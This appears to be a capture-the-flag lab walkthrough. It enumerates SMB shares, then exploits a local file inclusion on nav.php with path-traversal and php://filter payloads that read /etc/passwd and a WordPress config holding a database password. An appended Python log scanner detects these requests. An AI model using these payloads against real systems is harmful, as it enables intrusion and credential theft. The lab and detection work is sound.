SMB 172.16.1.10 445 DANTE-NIX02 ----- ----------- ------
SMB 172.16.1.10 445 DANTE-NIX02 print$ Printer Drivers
SMB 172.16.1.10 445 DANTE-NIX02 SlackMigration READ
SMB 172.16.1.10 445 DANTE-NIX02 IPC$ IPC Service (DANTE-NIX02 server (Samba, Ubuntu))
Shares information
impacket-smbclient 172.16.1.10 -port 445
use Slackmigration
cat admintasks.txt
- Remove wordpress install from web root - PENDING
- Reinstate Slack integration on Ubuntu machine - PENDING
- Remove old employee accounts - COMPLETE
- Inform Margaret of the new changes - COMPLETE
- Remove account restrictions on Margarets account post-promotion to admin - PENDING
What do I think
I remember that the todos found on NIX01 said to patch the LFI from the other website. I checked the website, and changing the tabs showed me that there is an LFI. Here it says to remove the WordPress install from the web root, so I might find creds there. Margaret is a new account.
Rustscan
Open 172.16.1.10:22
Open 172.16.1.10:80
Open 172.16.1.10:139
Open 172.16.1.10:445
LFI
So the following link gives me the LFI
http://172.16.1.10/nav.php?page=../../../../var/www/html/../../../etc/passwd
As mentioned in the txt file, there is still a WordPress configuration on the server. The PHP file cannot be accessed directly, so I need to use the PHP filter for it.
curl 'http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=../../../../../var/www/html/wordpress/wp-config.php' | base64 -d
Output
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'margaret' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Welcome1!2@3#' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
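
Added example, not part of the original notes: how the two requests above show up to a defender reading the web server's access log. The log lines, client address, combined log format and rule names are constructed assumptions; the check percent-decodes each query parameter until stable and flags stream wrappers, traversal sequences and the files targeted here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in combined log format (assumed); not captured from the lab host.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /nav.php?page=about.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /nav.php?page=../../../../var/www/html/../../../etc/passwd HTTP/1.1" 200 1790 "-" "curl/8.5.0"
10.10.14.5 - - [01/Jan/2024:10:00:31 +0000] "GET /nav.php?page=php://filter/convert.base64-encode/resource=../../../../../var/www/html/wordpress/wp-config.php HTTP/1.1" 200 4312 "-" "curl/8.5.0"
10.10.14.5 - - [01/Jan/2024:10:00:40 +0000] "GET /nav.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1790 "-" "curl/8.5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Hypothetical rule names; each regex runs on the fully decoded parameter value.
RULES = {
    "stream-wrapper": re.compile(r"(?:php|data|expect|file|zip|phar)://", re.I),
    "path-traversal": re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)"),
    "sensitive-file": re.compile(r"/etc/passwd|wp-config\.php", re.I),
}

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (client_ip, param, decoded_value, rule_names) per suspicious parameter."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    hits = []
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = fully_decode(raw)
        matched = sorted(rule for rule, rx in RULES.items() if rx.search(value))
        if matched:
            hits.append((m["ip"], name, value, matched))
    return hits

def scan_log(text):
    return [hit for line in text.splitlines() for hit in scan_line(line)]

if __name__ == "__main__":
    for ip, param, value, rules in scan_log(SAMPLE_LOG):
        print(f"{ip} {param}={value} -> {', '.join(rules)}")
```

Detection only covers what reaches the log; the underlying fix is for nav.php to map the page parameter to a fixed allowlist of files instead of passing it to include.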